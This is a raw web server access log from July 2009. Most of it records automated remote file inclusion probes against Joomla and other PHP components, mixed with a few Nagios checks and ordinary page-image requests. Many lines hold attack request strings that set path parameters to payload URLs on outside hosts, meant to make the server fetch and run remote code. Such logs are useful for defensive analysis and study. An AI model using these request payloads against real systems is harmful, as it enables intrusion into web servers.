74.55.30.194 - - [28/Jul/2009:00:41:41 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:41 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:41 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:42 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:42 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:42 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:46 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:46 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:46 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:47 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:47 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:41:47 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:02 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:04 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:06 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:06 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:11 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:11 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:11 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:12 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:12 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:12 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:42:13 -0400] "GET /logs/access_log.Q109061400//admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:42:13 -0400] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:42:13 -0400] "GET //admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:42:14 -0400] "GET /logs/access_log.Q109071000//admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:23 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:00:42:24 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.234.63.107 - - [28/Jul/2009:00:42:35 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.63.107 - - [28/Jul/2009:00:42:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.63.107 - - [28/Jul/2009:00:42:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.234.7.92 - - [28/Jul/2009:00:42:40 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:42:40 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:42:40 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:42:40 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.234.63.107 - - [28/Jul/2009:00:42:47 -0400] "GET /logs/access_log.Q109070200//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
202.125.45.45 - - [28/Jul/2009:00:43:02 -0400] "GET /logs/access_log.Q109051300/index.php?_REQUEST=&_REQUEST[option]=option,com_akocomment&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:43:02 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_akocomment&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:43:02 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_akocomment&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:43:21 -0400] "GET /logs/access_log.Q109050900/index.php?_REQUEST=&_REQUEST[option]=option,com_akocomment&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
207.58.140.78 - - [28/Jul/2009:00:43:54 -0400] "GET /logs//modules/4nAlbum/public/errors.php?error=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:43:54 -0400] "GET /logs/access_log.Q109070800//modules/4nAlbum/public/errors.php?error=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:43:54 -0400] "GET //modules/4nAlbum/public/errors.php?error=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:44:04 -0400] "GET /logs/access_log.Q109061700%20%20//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:44:43 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:44:43 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:44:43 -0400] "GET /logs/access_log.Q109051000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:44:43 -0400] "GET /logs/access_log.Q109050800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:45:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.98.134.54 - - [28/Jul/2009:00:45:11 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:11 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:11 -0400] "GET /logs/access_log.Q109051000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:11 -0400] "GET /logs/access_log.Q109050800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:12 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:12 -0400] "GET /logs/access_log.Q109051000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:12 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:45:12 -0400] "GET /logs/access_log.Q109050800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:00:45:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:00:45:21 -0400] "GET /logs/error_log.Q109062300//include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:00:45:21 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.218.5.234 - - [28/Jul/2009:00:45:21 -0400] "GET /logs/access_log.Q109061100//include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.234.63.107 - - [28/Jul/2009:00:45:25 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.63.107 - - [28/Jul/2009:00:45:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.63.107 - - [28/Jul/2009:00:45:25 -0400] "GET //include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.234.7.92 - - [28/Jul/2009:00:45:34 -0400] "GET /logs/access_log.Q109061700%20%20//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.234.63.107 - - [28/Jul/2009:00:45:37 -0400] "GET /logs/access_log.Q109070200//include/mail.inc.php?skin_board_path=http://ora.by/language/tukulid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.98.134.54 - - [28/Jul/2009:00:46:20 -0400] "GET /logs/access_log.Q109051000%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:46:20 -0400] "GET /logs/access_log.Q109050800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:46:23 -0400] "GET /logs/access_log.Q109061400%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:46:30 -0400] "GET /logs/access_log.Q109051000%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:46:31 -0400] "GET /logs/access_log.Q109050800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:46:36 -0400] "GET /logs/access_log.Q109071000%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:46:48 -0400] "GET /logs/access_log.Q109051000%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109050800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.50.85.19 - - [28/Jul/2009:00:49:09 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.50.85.19 - - [28/Jul/2009:00:49:09 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.50.85.19 - - [28/Jul/2009:00:49:09 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.50.85.19 - - [28/Jul/2009:00:49:17 -0400] "GET /logs/access_log.Q109062100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:49:28 -0400] "GET /logs/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:49:28 -0400] "GET /logs/access_log.Q109060600/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:49:28 -0400] "GET /show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:49:46 -0400] "GET /logs/access_log.Q109051400/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:50:06 -0400] "GET /logs/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:50:06 -0400] "GET /show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:50:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.50.85.19 - - [28/Jul/2009:00:50:18 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:50:22 -0400] "GET /logs/access_log.Q109060600/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.50.85.19 - - [28/Jul/2009:00:50:22 -0400] "GET /logs/access_log.Q109062100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:50:45 -0400] "GET /logs/access_log.Q109051400/show_news.php?cutepath=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:52:26 -0400] "GET /logs/access_log.Q109061700//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:52:38 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:52:38 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:52:39 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:52:43 -0400] "GET /logs/access_log.Q109060600%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:53:02 -0400] "GET /logs/access_log.Q109061700//classes/adodbt/sql.php?classes_dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:53:50 -0400] "GET /logs/access_log.Q109071200//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.189.39.159 - - [28/Jul/2009:00:53:53 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.189.39.159 - - [28/Jul/2009:00:53:53 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.189.39.159 - - [28/Jul/2009:00:53:53 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 200 11334 "-" "Mozilla/5.0"
72.55.179.121 - - [28/Jul/2009:00:54:44 -0400] "GET /logs/access_log.Q109071200//bbs//skin/ggambo7002_board/write.php?dir=http://ora.by/language/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:55:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.101.240.6 - - [28/Jul/2009:00:55:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.182.98 - - [28/Jul/2009:00:55:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.182.98 - - [28/Jul/2009:00:55:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.182.98 - - [28/Jul/2009:00:55:54 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
87.101.240.6 - - [28/Jul/2009:00:55:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
